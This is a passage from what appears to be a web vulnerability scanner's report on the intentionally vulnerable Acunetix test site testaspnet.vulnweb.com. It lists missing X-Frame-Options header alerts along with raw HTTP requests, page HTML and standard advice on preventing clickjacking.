COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/login.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 13269Response body (13269 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 22687Response body (22687 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYX